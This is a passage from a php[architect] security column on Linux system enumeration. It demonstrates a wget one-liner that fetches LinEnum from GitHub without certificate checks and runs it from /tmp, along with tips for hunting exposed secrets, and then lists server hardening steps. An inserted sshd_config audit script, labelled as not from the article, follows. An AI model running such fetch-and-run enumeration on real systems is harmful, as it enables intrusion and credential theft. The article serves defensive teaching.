phparchitect-2019-08

http://www.phparch.com \ August 2019 \ 33

System Enumeration


Security Corner


Once you execute this command, you’re logged in as nobody
on a pristine Alpine system as in Figure 1.
Now, we don our black hat and execute a simple, one-line
command to both install and execute LinEnum against the
server:

cd /tmp && wget --no-check-certificate \
  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh && \
  /bin/sh LinEnum.sh

On most systems, everyone—including nobody—has write
access to the /tmp directory. This directory gives us a good
place to drop our enumeration script where it likely won’t be
found by a scanner. In many situations, the /tmp directory is
purged on a schedule anyway, so we don’t even need to clean
up afterward! Since we know wget exists on this machine, I’m
executing it directly with the --no-check-certificate flag to
skip any SSL/TLS validation with the host from which we’re
pulling the script. Finally, we invoke the script with its broad,
default (empty) parameters.
The script itself, once it’s on the machine, runs a wide variety
of scans against the system. What environment variables^4 are
exposed? Which users are available? Are their passwords
visible? Can we read their home directory? What network
interfaces are available?
An optional -t flag runs more thorough tests, and once you
know how a system is configured, you can drill even deeper
with keyword searches against exposed files in the system—
perhaps searching for strings like AWS_SECRET or API_KEY.
System enumeration is a powerful way for an attacker to
exfiltrate data from your system with minimal effort; all we’ve
done is log in and run a single command!

System Protections and Continuous Awareness
Unfortunately, there’s little you can do that you’re not
already doing to protect yourself from LinEnum and tools
like it. If someone’s already inside your machine, and they can
run a script, then they will run it and do whatever they can.
That little you can do, though, is powerful:



  • Disable the root user and ensure any interactive users
    are logging in under individual accounts for logging and
    tracking purposes.

  • Ensure every application runs as an unprivileged user.

  • Block logins to any account that doesn’t need a human
    to log in—explicitly whitelist interactive SSH users via
    AllowUsers in sshd config^5.

  • Ensure every human user of your system is using a strong
    SSH key to authenticate and disable password authentication
    entirely.

  • Log every authentication event—both success and failure—
    and monitor those logs for anomalies.

  • Implement application and system-level intrusion detection
    systems^6.

There’s a very good chance you’re already doing much, if
not all, of the above. That means your system features strong
protection and you can rest easy—so long as you and your
team stay on top of things. The landscape changes daily; it’s up
to you to understand what those changes entail and the way
they’ll be used as leverage against your system. Understanding
the tools and techniques an attacker uses to breach—and
once they’ve successfully breached—your system helps keep
you one step ahead.

4 environment variables: https://phpa.me/security-corner-june-2019
5 via AllowUsers in sshd config: https://phpa.me/restrict-ssh-account
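One way to check a host against that checklist, as an added example that is not the article's code: a POSIX shell audit of an OpenSSH sshd_config covering the root-login, AllowUsers, password-authentication and logging items. The directive names are standard OpenSSH ones; the config path is whatever you pass in, and the audit_sshd/sshd_value function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the article): audit an OpenSSH sshd_config
# against the hardening checklist above. Prints one line per finding
# and returns the number of findings (0 means every item passed).

# Effective value of a directive. OpenSSH honours the FIRST occurrence
# of a keyword, so take the first match (keywords are case-insensitive),
# skip comment lines, and stop at the first Match block, because
# directives after it apply only conditionally.
sshd_value() {
    # $1 = config file, $2 = directive name
    awk -v key="$2" '
        /^[[:space:]]*#/              { next }
        tolower($1) == "match"        { exit }
        tolower($1) == tolower(key)   { print $2; exit }
    ' "$1"
}

audit_sshd() {
    cfg="$1"; findings=0
    # 1. No direct root login: humans use individual, traceable accounts.
    v=$(sshd_value "$cfg" PermitRootLogin)
    [ "$v" = "no" ] || { echo "PermitRootLogin is '${v:-unset}', want no"; findings=$((findings + 1)); }
    # 2. Explicit whitelist of interactive SSH users.
    v=$(sshd_value "$cfg" AllowUsers)
    [ -n "$v" ] || { echo "AllowUsers unset: every local account may log in"; findings=$((findings + 1)); }
    # 3. Keys only: password authentication disabled entirely.
    v=$(sshd_value "$cfg" PasswordAuthentication)
    [ "$v" = "no" ] || { echo "PasswordAuthentication is '${v:-unset}', want no"; findings=$((findings + 1)); }
    # 4. Log every authentication event; VERBOSE records which key was used.
    v=$(sshd_value "$cfg" LogLevel)
    case "$v" in
        VERBOSE|DEBUG*) ;;
        *) echo "LogLevel is '${v:-unset}', want VERBOSE"; findings=$((findings + 1)) ;;
    esac
    return "$findings"
}

# Usage: sh audit_sshd.sh /etc/ssh/sshd_config
[ $# -gt 0 ] && audit_sshd "$1"
```

The script only reads the file you hand it; compare its findings with `sshd -T`, which prints the daemon's effective settings, if the config uses Include or Match heavily.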


Eric is a seasoned web developer experienced with multiple languages
and platforms. He’s been working with PHP for more than a decade and
focuses his time on helping developers get started and learn new skills
with their tech of choice. You can reach out to him directly via
Twitter: @EricMann

6 intrusion detection systems:
https://phpa.me/security-corner-march-2019

Figure 1

Figure 2. LinEnum running in Alpine